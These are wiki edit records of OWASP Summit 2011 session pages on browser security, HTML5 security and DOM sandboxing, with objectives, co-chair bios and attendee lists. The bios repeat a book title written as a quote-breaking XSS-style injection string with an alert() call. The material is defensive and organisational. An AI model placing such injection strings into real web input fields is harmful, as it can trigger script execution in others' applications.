| related_project_name2 = Google Group for the Browser Security Track<br /> | related_project_url_2 = https://groups.google.com/group/owasp-summit-browsersec<br /> <br /> | related_project_name3 = <br /> | related_project_url_3 = <br /> <br /> | related_project_name4 = <br /> | related_project_url_4 = <br /> <br /> | related_project_name5 = <br /> | related_project_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_objective_name1= '''Fix the problems with Object.defineProperty() and property unsealing / [https://bugzilla.mozilla.org/show_bug.cgi?id=588138 double-freezing]'''.&lt;noinclude&gt; Implement it if not yet done.&lt;/noinclude&gt;<br /> <br /> | summit_session_objective_name2 = &lt;noinclude&gt;'''Goal I''': &lt;/noinclude&gt;Raise awareness for the power or object freezing in a security context. &lt;noinclude&gt;ES5 can really make a change here.&lt;/noinclude&gt;<br /> <br /> | summit_session_objective_name3 = &lt;noinclude&gt;'''Goal II''':&lt;/noinclude&gt; Raise awareness in seeing the DOM as the place where XSS attacks actually take place - and where they should be prevented. &lt;noinclude&gt; CSP is a great yet still immature start - but worth discussing and extending. Discuss specification drafts for a secure DOM and easy to configure capability profiles with reasonable and quantitative proofs of concept.&lt;/noinclude&gt;<br /> <br /> | summit_session_objective_name4 = '''Long Term Goal''': Discuss the possibility of vendor supported client side security mechanisms. &lt;noinclude&gt;Client side IDS/IPS based on ES5 can be possible - yet have to be designed and specified. &lt;/noinclude&gt;<br /> <br /> | summit_session_objective_name5 = <br /> |-<br /> <br /> | working_session_date_and_time = Tuesday, 09 February &lt;br&gt; Time: TBA<br /> <br /> |-<br /> <br /> | discussion_model = The working form will most probably be short presentations to frame the topic and then round table discussions. Depending on number of attendees we'll break into groups.<br /> <br /> |-<br /> <br /> | operational_resources = Projector, whiteboards, markers, Internet connectivity, power<br /> <br /> |-<br /> <br /> | working_session_additional_details = &lt;br&gt;<br /> <br /> ===Co-chair Mario Heiderich===<br /> Mario Heiderich works as a researcher for the Ruhr-University in Bochum, Germany and currently focuses on HTML5, SVG security and security implications of the ES5 specification draft. Mario invoked the [http://html5sec.org/ HTML5 security cheat-sheet] and maintains the [http://php-ids.org/ PHPIDS filter rules]. In his spare time he delivers trainings and security consultancy for larger German and international companies. He is also one of the co-authors of [http://www.amazon.com/Web-Application-Obfuscation-WAFs-Evasion-Filters-alert/dp/1597496049 Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-'] – a book on how an attacker would bypass different types of security controls including IDS/IPS.<br /> <br /> ===Co-chair 2===<br /> To be confirmed.<br /> <br /> |-<br /> <br /> |summit_session_deliverable_name1 = Browser Security Report<br /> |summit_session_deliverable_url_1 = <br /> <br /> |summit_session_deliverable_name2 = Browser Security Priority List<br /> |summit_session_deliverable_url_2 = <br /> <br /> |summit_session_deliverable_name3 = <br /> |summit_session_deliverable_url_3 = <br /> <br /> |summit_session_deliverable_name4 = <br /> |summit_session_deliverable_url_4 = <br /> <br /> |summit_session_deliverable_name5 = <br /> |summit_session_deliverable_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_leader_name1 = Mario Heiderich<br /> | summit_session_leader_email1 = <br /> <br /> | summit_session_leader_name2 = TBC<br /> | summit_session_leader_email2 = <br /> <br /> | summit_session_leader_name3 =<br /> | summit_session_leader_email3 = <br /> <br /> |-<br /> <br /> | operational_leader_name1 = John Wilander<br /> | operational_leader_email1 = john.wilander@owasp.org<br /> <br /> |-<br /> | meeting_notes = <br /> |-<br /> | session_name_mask = &lt;!--Please replace DO NOT EDIT this string --&gt; Session003<br /> | session_home_page = &lt;!--Please replace DO NOT EDIT this string --&gt; Summit_2011_Working_Sessions/Session003<br /> }}<br /> &lt;/includeonly&gt;</div> Wisec https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session002&diff=101832 Summit 2011 Working Sessions/Session002 2011-01-25T09:45:55Z <p>Wisec: </p> <hr /> <div>{{Template:&lt;includeonly&gt;{{{1}}}&lt;/includeonly&gt;&lt;noinclude&gt;Summit 2011 Working Sessions test tab&lt;/noinclude&gt;<br /> |-<br /> <br /> | summit_session_attendee_name1 = John Wilander<br /> | summit_session_attendee_email1 = john.wilander@owasp.org<br /> | summit_session_attendee_company1=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=<br /> <br /> | summit_session_attendee_name2 = Michael Coates<br /> | summit_session_attendee_email2 = <br /> | summit_session_attendee_company2=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=<br /> <br /> | summit_session_attendee_name3 = Colin Watson<br /> | summit_session_attendee_email3 = <br /> | summit_session_attendee_company3=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=<br /> <br /> | summit_session_attendee_name4 = Stefano Di Paola<br /> | summit_session_attendee_email4 = <br /> | summit_session_attendee_company4=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=<br /> <br /> | summit_session_attendee_name5 = <br /> | summit_session_attendee_email5 = <br /> | summit_session_attendee_company5=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=<br /> <br /> | summit_session_attendee_name6 = <br /> | summit_session_attendee_email6 = <br /> | summit_session_attendee_company6=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6=<br /> <br /> | summit_session_attendee_name7 = <br /> | summit_session_attendee_email7 = <br /> | summit_session_attendee_company7=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=<br /> <br /> | summit_session_attendee_name8 = <br /> | summit_session_attendee_email8 = <br /> | summit_session_attendee_company8=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8=<br /> <br /> | summit_session_attendee_name9 = <br /> | summit_session_attendee_email9 = <br /> | summit_session_attendee_company9=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=<br /> <br /> | summit_session_attendee_name10 = <br /> | summit_session_attendee_email10 = <br /> | summit_session_attendee_company10=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=<br /> <br /> | summit_session_attendee_name11 = <br /> | summit_session_attendee_email11 = <br /> | summit_session_attendee_company11=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=<br /> <br /> | summit_session_attendee_name12 = <br /> | summit_session_attendee_email12 = <br /> | summit_session_attendee_company12=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=<br /> <br /> | summit_session_attendee_name13 = <br /> | summit_session_attendee_email13 = <br /> | summit_session_attendee_company13=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=<br /> <br /> | summit_session_attendee_name14 = <br /> | summit_session_attendee_email14 = <br /> | summit_session_attendee_company14=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= <br /> <br /> | summit_session_attendee_name15 = <br /> | summit_session_attendee_email15 = <br /> | summit_session_attendee_company15=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=<br /> <br /> | summit_session_attendee_name16 = <br /> | summit_session_attendee_email16 = <br /> | summit_session_attendee_company16=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=<br /> <br /> | summit_session_attendee_name17 = <br /> | summit_session_attendee_email17 = <br /> | summit_session_attendee_company17=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=<br /> <br /> | summit_session_attendee_name18 = <br /> | summit_session_attendee_email18 = <br /> | summit_session_attendee_company18=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=<br /> <br /> | summit_session_attendee_name19 = <br /> | summit_session_attendee_email19 = <br /> | summit_session_attendee_company19=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=<br /> <br /> | summit_session_attendee_name20 = <br /> | summit_session_attendee_email20 = <br /> | summit_session_attendee_company20=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=<br /> <br /> |-<br /> | summit_track_logo = [[Image:T._browser_security.jpg]]<br /> | summit_ws_logo = [[Image:WS._browser_security.jpg]]<br /> | summit_session_name = HTML5 Security<br /> | summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session002<br /> | mailing_list = https://groups.google.com/group/owasp-summit-browsersec<br /> |-<br /> <br /> | short_working_session_description= <br /> |-<br /> <br /> | related_project_name1 = Browser Security Track - main page<br /> | related_project_url_1 = http://www.owasp.org/index.php/Category:Summit_2011_Browser_Security_Track<br /> <br /> | related_project_name2 = Google Group for the Browser Security Track<br /> | related_project_url_2 = https://groups.google.com/group/owasp-summit-browsersec<br /> <br /> | related_project_name3 = <br /> | related_project_url_3 = <br /> <br /> | related_project_name4 = <br /> | related_project_url_4 = <br /> <br /> | related_project_name5 = <br /> | related_project_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_objective_name1= '''Handle autofocus in a unified and secure way'''.&lt;noinclude&gt; Make sure SOP applies for autofocus usage in frame/iframe'd websites. Re-discuss necessity for (future) attributes like this.&lt;/noinclude&gt;<br /> <br /> | summit_session_objective_name2 = '''Discuss necessity and capability for the HTML5 form controls'''.&lt;noinclude&gt; Do we need a non-SOP formaction attribute and why? &lt;/noinclude&gt;<br /> <br /> | summit_session_objective_name3 = &lt;noinclude&gt;'''Goal I''':&lt;/noinclude&gt; Initiate and create documentation and references for developers that address security issues. &lt;noinclude&gt;Html5sec.org is a start but impossible to continue or extend large scale without vendor help&lt;/noinclude&gt;<br /> <br /> | summit_session_objective_name4 = &lt;noinclude&gt;'''Goal II''':&lt;/noinclude&gt;Discuss and heavily restrict SVG capabilities - especially when deployed in CSS backgrounds and &lt;img&gt; tags. &lt;noinclude&gt;Mainly Opera and Mozilla are addressed here.&lt;/noinclude&gt;<br /> <br /> | summit_session_objective_name5 = '''Long Term Goal(s)''': Provide a working and easy to use as well as vendor supported HTML5 compliant filter software such as HTMLPurifier. &lt;noinclude&gt;Browser vendors should participate in creating security software and filters - not undermine them as we could experience in the last decade.&lt;/noinclude&gt;<br /> |-<br /> <br /> | working_session_date_and_time = Tuesday, 09 February &lt;br&gt; Time: TBA<br /> <br /> |-<br /> <br /> | discussion_model = The working form will most probably be short presentations to frame the topic and then round table discussions. Depending on number of attendees we'll break into groups.<br /> <br /> |-<br /> <br /> | operational_resources = Projector, whiteboards, markers, Internet connectivity, power<br /> <br /> |-<br /> <br /> | working_session_additional_details = &lt;br&gt;<br /> <br /> [[Image:Html5_mario_hackvertor.jpg‎‎]]<br /> <br /> ===Co-chair Mario Heiderich===<br /> Mario Heiderich works as a researcher for the Ruhr-University in Bochum, Germany and currently focuses on HTML5, SVG security and security implications of the ES5 specification draft. Mario invoked the [http://html5sec.org/ HTML5 security cheat-sheet] and maintains the [http://php-ids.org/ PHPIDS filter rules]. In his spare time he delivers trainings and security consultancy for larger German and international companies. He is also one of the co-authors of [http://www.amazon.com/Web-Application-Obfuscation-WAFs-Evasion-Filters-alert/dp/1597496049 Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-'] – a book on how an attacker would bypass different types of security controls including IDS/IPS.<br /> <br /> ===Co-chair Gareth Heyes===<br /> Gareth &quot;Gaz&quot; Heyes calls himself Chief Conspiracy theorist and is affiliated with Microsoft. He is the designer and developer behind [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=JSReg JSReg] – a Javascript sandbox which converts code using regular expressions; [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=HTMLReg HTMLReg] &amp; [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=CSSReg CSSReg] – converters of malicious HTML/CSS into a safe form of HTML. He is also one of the co-authors of [http://www.amazon.com/Web-Application-Obfuscation-WAFs-Evasion-Filters-alert/dp/1597496049 Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-'] – a book on how an attacker would bypass different types of security controls including IDS/IPS.<br /> <br /> |-<br /> <br /> |summit_session_deliverable_name1 = Browser Security Report<br /> |summit_session_deliverable_url_1 = <br /> <br /> |summit_session_deliverable_name2 = Browser Security Priority Report<br /> |summit_session_deliverable_url_2 = <br /> <br /> |summit_session_deliverable_name3 = <br /> |summit_session_deliverable_url_3 = <br /> <br /> |summit_session_deliverable_name4 = <br /> |summit_session_deliverable_url_4 = <br /> <br /> |summit_session_deliverable_name5 = <br /> |summit_session_deliverable_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_leader_name1 = Mario Heiderich<br /> | summit_session_leader_email1 = <br /> <br /> | summit_session_leader_name2 = Gareth Heyes<br /> | summit_session_leader_email2 = <br /> <br /> | summit_session_leader_name3 =<br /> | summit_session_leader_email3 = <br /> <br /> |-<br /> <br /> | operational_leader_name1 = John Wilander<br /> | operational_leader_email1 = john.wilander@owasp.org<br /> <br /> |-<br /> | meeting_notes = <br /> |-<br /> | session_name_mask = &lt;!--Please replace DO NOT EDIT this string --&gt; Session002<br /> | session_home_page = &lt;!--Please replace DO NOT EDIT this string --&gt; Summit_2011_Working_Sessions/Session002<br /> }}<br /> &lt;/includeonly&gt;</div> Wisec https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session001&diff=101831 Summit 2011 Working Sessions/Session001 2011-01-25T09:44:29Z <p>Wisec: </p> <hr /> <div>{{Template:&lt;includeonly&gt;{{{1}}}&lt;/includeonly&gt;&lt;noinclude&gt;Summit 2011 Working Sessions test tab&lt;/noinclude&gt;<br /> |-<br /> <br /> | summit_session_attendee_name1 = Email John Wilander if you are unable to edit the Wiki and would like to sign up!<br /> | summit_session_attendee_email1 = john.wilander@owasp.org<br /> | summit_session_attendee_company1=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=<br /> <br /> | summit_session_attendee_name2 = Michael Coates<br /> | summit_session_attendee_email2 = <br /> | summit_session_attendee_company2=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=<br /> <br /> | summit_session_attendee_name3 = Colin Watson<br /> | summit_session_attendee_email3 = <br /> | summit_session_attendee_company3=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=<br /> <br /> | summit_session_attendee_name4 = Stefano Di Paola<br /> | summit_session_attendee_email4 = <br /> | summit_session_attendee_company4=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=<br /> <br /> | summit_session_attendee_name5 = <br /> | summit_session_attendee_email5 = <br /> | summit_session_attendee_company5=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=<br /> <br /> | summit_session_attendee_name6 = <br /> | summit_session_attendee_email6 = <br /> | summit_session_attendee_company6=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6=<br /> <br /> | summit_session_attendee_name7 = <br /> | summit_session_attendee_email7 = <br /> | summit_session_attendee_company7=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=<br /> <br /> | summit_session_attendee_name8 = <br /> | summit_session_attendee_email8 = <br /> | summit_session_attendee_company8=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8=<br /> <br /> | summit_session_attendee_name9 = <br /> | summit_session_attendee_email9 = <br /> | summit_session_attendee_company9=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=<br /> <br /> | summit_session_attendee_name10 = <br /> | summit_session_attendee_email10 = <br /> | summit_session_attendee_company10=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=<br /> <br /> | summit_session_attendee_name11 = <br /> | summit_session_attendee_email11 = <br /> | summit_session_attendee_company11=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=<br /> <br /> | summit_session_attendee_name12 = <br /> | summit_session_attendee_email12 = <br /> | summit_session_attendee_company12=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=<br /> <br /> | summit_session_attendee_name13 = <br /> | summit_session_attendee_email13 = <br /> | summit_session_attendee_company13=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=<br /> <br /> | summit_session_attendee_name14 = <br /> | summit_session_attendee_email14 = <br /> | summit_session_attendee_company14=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= <br /> <br /> | summit_session_attendee_name15 = <br /> | summit_session_attendee_email15 = <br /> | summit_session_attendee_company15=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=<br /> <br /> | summit_session_attendee_name16 = <br /> | summit_session_attendee_email16 = <br /> | summit_session_attendee_company16=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=<br /> <br /> | summit_session_attendee_name17 = <br /> | summit_session_attendee_email17 = <br /> | summit_session_attendee_company17=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=<br /> <br /> | summit_session_attendee_name18 = <br /> | summit_session_attendee_email18 = <br /> | summit_session_attendee_company18=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=<br /> <br /> | summit_session_attendee_name19 = <br /> | summit_session_attendee_email19 = <br /> | summit_session_attendee_company19=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=<br /> <br /> | summit_session_attendee_name20 = <br /> | summit_session_attendee_email20 = <br /> | summit_session_attendee_company20=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=<br /> <br /> |-<br /> | summit_track_logo = [[Image:T._browser_security.jpg]]<br /> | summit_ws_logo = [[Image:WS._browser_security.jpg]]<br /> | summit_session_name = DOM Sandboxing<br /> | summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session001<br /> | mailing_list = https://groups.google.com/group/owasp-summit-browsersec<br /> |-<br /> <br /> | short_working_session_description= '''Virtualization and Sandboxing for Secure Multi-Domain Web Apps'''<br /> |-<br /> <br /> | related_project_name1 = Browser Security Track - main page<br /> | related_project_url_1 = http://www.owasp.org/index.php/Category:Summit_2011_Browser_Security_Track<br /> <br /> | related_project_name2 = Google Group for the Browser Security Track<br /> | related_project_url_2 = https://groups.google.com/group/owasp-summit-browsersec<br /> <br /> | related_project_name3 = <br /> | related_project_url_3 = <br /> <br /> | related_project_name4 = <br /> | related_project_url_4 = <br /> <br /> | related_project_name5 = <br /> | related_project_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_objective_name1= '''Attenuated versions of existing apis to sandboxed code'''. &lt;noinclude&gt;How should browsers introduce new apis into the sandbox or allow the sandbox to provide attenuated versions of existing apis to sandboxed code? For example, lets say the sandbox wants to provide an attenuated &quot;alert&quot; function to sandboxed code which does something slightly different than the real &quot;alert&quot;. What kind of apis could the browser provide to safely allow such extensions/apis? Do these need to be standardized such that different sandbox vendors can interoperate.&lt;/noinclude&gt;<br /> <br /> | summit_session_objective_name2 = '''Client side sandboxed apps maintaining state and authentication'''.&lt;noinclude&gt; For example if a user is created in a sandboxed app how is it determined what that user can do?&lt;/noinclude&gt;<br /> <br /> | summit_session_objective_name3 = '''Create a standard for modifying a sandboxed environment'''<br /> <br /> | summit_session_objective_name4 = '''Deprecate and discourage standards''' which ambiently or undeniably pass credentials. <br /> <br /> | summit_session_objective_name5 = '''Create a standard for authentication within a sandboxed environment''' (maybe interfacing with existing auth without passing creds like 0Auth works)<br /> <br /> |-<br /> <br /> | working_session_date_and_time = Tuesday, 09 February &lt;br&gt; Time: TBA<br /> <br /> |-<br /> <br /> | discussion_model = The working form will most probably be short presentations to frame the topic and then round table discussions. Depending on number of attendees we'll break into groups.<br /> <br /> |-<br /> <br /> | operational_resources = Projector, whiteboards, markers, Internet connectivity, power<br /> <br /> |-<br /> <br /> | working_session_additional_details = &lt;br&gt;<br /> [[Image:JS_DOM_Box_Jasvir_Gaz.jpg]]<br /> <br /> ===Co-chair Dr Jasvir Nagra===<br /> Jasvir Nagra is a researcher and software engineer at Google. He is the designer of [http://code.google.com/p/google-caja/ Caja] - a secure subset of HTML, CSS and JavaScript; co-author of [http://www.amazon.com/Surreptitious-Software-Obfuscation-Watermarking-Tamperproofing/dp/0321549252 Surreptitious Software] - a book on obfuscation, software watermarking and tamper-proofing, contributer to [http://shindig.apache.org/ Shindig] - the reference implementation of OpenSocial.<br /> <br /> ===Co-chair Gareth Heyes===<br /> Gareth &quot;Gaz&quot; Heyes calls himself Chief Conspiracy theorist and is affiliated with Microsoft. He is the designer and developer behind [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=JSReg JSReg] – a Javascript sandbox which converts code using regular expressions; [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=HTMLReg HTMLReg] &amp; [http://www.owasp.org/index.php/OWASP_JavaScript_Sandboxes#tab=CSSReg CSSReg] – converters of malicious HTML/CSS into a safe form of HTML. He is also one of the co-authors of [http://www.amazon.com/Web-Application-Obfuscation-WAFs-Evasion-Filters-alert/dp/1597496049 Web Application Obfuscation: '-/WAFs..Evasion..Filters//alert(/Obfuscation/)-'] – a book on how an attacker would bypass different types of security controls including IDS/IPS.<br /> <br /> |-<br /> <br /> |summit_session_deliverable_name1 = Browser Security Report<br /> |summit_session_deliverable_url_1 = <br /> <br /> |summit_session_deliverable_name2 = Browser Security Priority List<br /> |summit_session_deliverable_url_2 = <br /> <br /> |summit_session_deliverable_name3 = <br /> |summit_session_deliverable_url_3 = <br /> <br /> |summit_session_deliverable_name4 = <br /> |summit_session_deliverable_url_4 = <br /> <br /> |summit_session_deliverable_name5 = <br /> |summit_session_deliverable_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_leader_name1 = Dr. Jasvir Nagra<br /> | summit_session_leader_email1 = <br /> <br /> | summit_session_leader_name2 = Gareth Heyes<br /> | summit_session_leader_email2 = <br /> <br /> | summit_session_leader_name3 =<br /> | summit_session_leader_email3 = <br /> <br /> |-<br /> <br /> | operational_leader_name1 = John Wilander<br /> | operational_leader_email1 = john.wilander@owasp.org<br /> <br /> |-<br /> | meeting_notes = <br /> |-<br /> | session_name_mask = &lt;!--Please replace DO NOT EDIT this string --&gt; Session001<br /> | session_home_page = &lt;!--Please replace DO NOT EDIT this string --&gt; Summit_2011_Working_Sessions/Session001 <br /> }}<br /> &lt;/includeonly&gt;</div> Wisec https://wiki.owasp.org/index.php?title=Summit_2011_Working_Sessions/Session056&diff=101830 Summit 2011 Working Sessions/Session056 2011-01-25T09:41:45Z <p>Wisec: </p> <hr /> <div>{{Template:&lt;includeonly&gt;{{{1}}}&lt;/includeonly&gt;&lt;noinclude&gt;Summit 2011 Working Sessions test tab&lt;/noinclude&gt;<br /> |-<br /> <br /> | summit_session_attendee_name1 = Stefano Di Paola<br /> | summit_session_attendee_email1 = stefano@owasp.org<br /> | summit_session_attendee_company1= Minded Security<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed1=<br /> <br /> | summit_session_attendee_name2 = <br /> | summit_session_attendee_email2 = <br /> | summit_session_attendee_company2=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed2=<br /> <br /> | summit_session_attendee_name3 = <br /> | summit_session_attendee_email3 = <br /> | summit_session_attendee_company3=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed3=<br /> <br /> | summit_session_attendee_name4 = <br /> | summit_session_attendee_email4 = <br /> | summit_session_attendee_company4=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed4=<br /> <br /> | summit_session_attendee_name5 = <br /> | summit_session_attendee_email5 = <br /> | summit_session_attendee_company5=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed5=<br /> <br /> | summit_session_attendee_name6 = <br /> | summit_session_attendee_email6 = <br /> | summit_session_attendee_company6=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed6=<br /> <br /> | summit_session_attendee_name7 = <br /> | summit_session_attendee_email7 = <br /> | summit_session_attendee_company7=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed7=<br /> <br /> | summit_session_attendee_name8 = <br /> | summit_session_attendee_email8 = <br /> | summit_session_attendee_company8=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed8=<br /> <br /> | summit_session_attendee_name9 = <br /> | summit_session_attendee_email9 = <br /> | summit_session_attendee_company9=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed9=<br /> <br /> | summit_session_attendee_name10 = <br /> | summit_session_attendee_email10 = <br /> | summit_session_attendee_company10=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed10=<br /> <br /> | summit_session_attendee_name11 = <br /> | summit_session_attendee_email11 = <br /> | summit_session_attendee_company11=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed11=<br /> <br /> | summit_session_attendee_name12 = <br /> | summit_session_attendee_email12 = <br /> | summit_session_attendee_company12=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed12=<br /> <br /> | summit_session_attendee_name13 = <br /> | summit_session_attendee_email13 = <br /> | summit_session_attendee_company13=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed13=<br /> <br /> | summit_session_attendee_name14 = <br /> | summit_session_attendee_email14 = <br /> | summit_session_attendee_company14=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed14= <br /> <br /> | summit_session_attendee_name15 = <br /> | summit_session_attendee_email15 = <br /> | summit_session_attendee_company15=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed15=<br /> <br /> | summit_session_attendee_name16 = <br /> | summit_session_attendee_email16 = <br /> | summit_session_attendee_company16=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed16=<br /> <br /> | summit_session_attendee_name17 = <br /> | summit_session_attendee_email17 = <br /> | summit_session_attendee_company17=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed17=<br /> <br /> | summit_session_attendee_name18 = <br /> | summit_session_attendee_email18 = <br /> | summit_session_attendee_company18=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed18=<br /> <br /> | summit_session_attendee_name19 = <br /> | summit_session_attendee_email19 = <br /> | summit_session_attendee_company19=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed19=<br /> <br /> | summit_session_attendee_name20 = <br /> | summit_session_attendee_email20 = <br /> | summit_session_attendee_company20=<br /> | summit_session_attendee_notes,_reason_for_participating_and_issues_to_be discussed20=<br /> <br /> |-<br /> | summit_track_logo = [[Image:T._metrics.jpg]]<br /> | summit_ws_logo = [[Image:WS._metrics.jpg]]<br /> | summit_session_name = Tools Interoperability (Data Instrumentation)<br /> | summit_session_url = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session056<br /> | mailing_list =<br /> |-<br /> <br /> | short_working_session_description=<br /> <br /> |-<br /> <br /> | related_project_name1 = <br /> | related_project_url_1 = <br /> <br /> | related_project_name2 = <br /> | related_project_url_2 = <br /> <br /> | related_project_name3 = <br /> | related_project_url_3 = <br /> <br /> | related_project_name4 = <br /> | related_project_url_4 = <br /> <br /> | related_project_name5 = <br /> | related_project_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_objective_name1= <br /> <br /> | summit_session_objective_name2 = <br /> <br /> | summit_session_objective_name3 = <br /> <br /> | summit_session_objective_name4 = <br /> <br /> | summit_session_objective_name5 = <br /> <br /> |-<br /> <br /> | working_session_date_and_time = <br /> <br /> |-<br /> <br /> | discussion_model = participants and attendees<br /> <br /> |-<br /> <br /> | operational_resources = Projector, whiteboards, markers, Internet connectivity, power<br /> <br /> |-<br /> <br /> | working_session_additional_details = <br /> <br /> |-<br /> <br /> |summit_session_deliverable_name1 = <br /> A standard schema for describing application security risks of all types, with a place for all relevant information – whether derived statically, dynamically, manually, or architecturally.<br /> |summit_session_deliverable_url_1 = http://www.owasp.org/index.php/Summit_2011_Working_Sessions/Session056/Deliverable_1<br /> <br /> |summit_session_deliverable_name2 = <br /> |summit_session_deliverable_url_2 = <br /> <br /> |summit_session_deliverable_name3 = <br /> |summit_session_deliverable_url_3 = <br /> <br /> |summit_session_deliverable_name4 = <br /> |summit_session_deliverable_url_4 = <br /> <br /> |summit_session_deliverable_name5 = <br /> |summit_session_deliverable_url_5 = <br /> <br /> |-<br /> <br /> | summit_session_leader_name1 = Dinis Cruz<br /> | summit_session_leader_email1 = dinis.cruz@owasp.org<br /> <br /> | summit_session_leader_name2 = <br /> | summit_session_leader_email2 = <br /> <br /> | summit_session_leader_name3 = <br /> | summit_session_leader_email3 = <br /> <br /> |-<br /> <br /> | operational_leader_name1 =<br /> | operational_leader_email1 =<br /> <br /> |-<br /> <br /> | meeting_notes = <br /> <br /> |-<br /> | session_name_mask = &lt;!--Please replace DO NOT EDIT this string --&gt; Session056<br /> | session_home_page = &lt;!--Please replace DO NOT EDIT this string --&gt; Summit_2011_Working_Sessions/Session056<br /> }}</div> Wisec https://wiki.owasp.org/index.php?title=Summit_2011_Attendee/Attendee075&diff=98483 Summit 2011 Attendee/Attendee075 2011-01-06T09:30:51Z <p>Wisec: </p> <hr /> <div>{{Template:&lt;includeonly&gt;{{{1}}}&lt;/includeonly&gt;&lt;noinclude&gt;OWASP 2011 Global Summit Attendee Tab&lt;/noinclude&gt;<br /> |-<br /> | summit_attendee_name1 = Stefano Di Paola<br /> | summit_attendee_email1 = stefano@owasp.org<br /> | summit_attendee_wiki_username1 = Wisec<br /> |-<br /> | summit_attendee_company = Minded Security<br /> |-<br /> | Project Leadership (less than 6 months old) = <br /> | Project Leadership (more than 6 months old) = SWFIntruder, Former Flash Security Project <br /> | Release Leadership (less than 6 months old) = <br /> | Release Leadership (more than 6 months old) = SWFIntruder<br /> | Project Contribution (less than 6 months old) = <br /> | Project Contribution (more than 6 months old) = OWASP Testing Guide<br /> | Release Contribution (less than 6 months old) = <br /> | 